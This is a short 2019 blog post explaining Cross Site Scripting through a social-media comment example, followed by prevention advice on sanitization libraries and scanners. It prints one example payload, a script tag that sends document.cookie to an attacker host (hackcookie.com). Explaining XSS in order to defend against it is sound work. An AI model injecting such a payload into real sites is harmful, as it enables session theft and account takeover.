What is Cross Site Scripting (XSS) Attack?

Posted by Sharmin Islam on May 19th, 2019

There are many ways attackers can make you a victim by their malicious activities. Cross Site Scripting (XSS) is a type of attack used to inject malicious scripts to an application by using coding vulnerabilities. In XSS attacks, users are mainly targeted to be at a risk.

In detail, Cross Site Scripting is a coding vulnerability. An attacker injects malicious scripts into a web page’s HTML or source code.

How is it performed?

A web page is vulnerable to XSS if the user input is not done and the HTML tags are not scripted properly. This is actually performed following a few steps.

For example, Suppose you’re making a comment on your friend’s facebook picture. As soon as you make the comment, the web page is going to be updated and your comment will be made visible under your friend’s picture. The HTML of the web page must be updated with this happening and this comment will be included. This change will be saved on the web server as well because the comment you made should be visible to all the people who are looking naturally your friend’s picture. So,  the Facebook web server will naturally save the changes of HTML of that web page permanently. This feature can be misused of course if the website is vulnerable to XSS attack.

Comments with some HTML tags like <i> </i>,<script></script> and so more can make a security threat. As long as the attacker uses HTML tags just like stylish comment tags, this is not a security issue but once he starts thinking about the script tag in HTML, things can go worse. The script tag in HTML is used to include JavaScript in web pages. JavaScript is browser oriented that means your browser will execute everything that is written in it. So, the hacker can make use of XSS to inject malicious JavaScript into the website’s HTML and do many devastating things.

The worst thing is the hacker can also steal users’ cookies by injecting a malicious JavaScript code like this: <script>window.location=”http://hackcookie.com/cookiestealer.php?cookie=” +document.cookie;</script> and send to the hackers’ database. So, if the hacker has your cookies, he will be able to login to your accounts without entering a password.

How can it be prevented?

In XSS, an attacker actually takes unauthorized access to your website by hacking it anonymously and stealing browser cookies and clipboard contents controlling it remotely. These malicious activities can be prevented by doing many.

The following suggestions will help to keep safe your users from XSS attacks:

Input Sanitization - A site containing such a search field that does not have proper input sanitizing. It needs to sanitize user input to catch potentially malicious user-provided input.

XSS HTML Filter - an XSS filter for Java used to sanitize user input properly against malicious HTML code injection.

Xssprotect - is an open source library for preventing Cross Site Scripting attacks that provide developers the way of removing all XSS attack potentialities.

HTML purifier - also an HTML filtering library written in PHP, used to remove malicious code from the input and available as a plug-in for most PHP frameworks.

Use web vulnerability scanning tools - To identify XSS vulnerabilities, you can use web vulnerability scanning tools in your software such as Scan My Server, SiteGuarding, Detectify, SUCURI and so more.

Cross Site Scripting is one of the critical website vulnerabilities that harm a user in many ways. By using the coding vulnerability hackers steal cookies of the users and spread malware executing malicious redirection. Vulnerability is easy to find out and prevent if you try following the ways an attacker usually uses.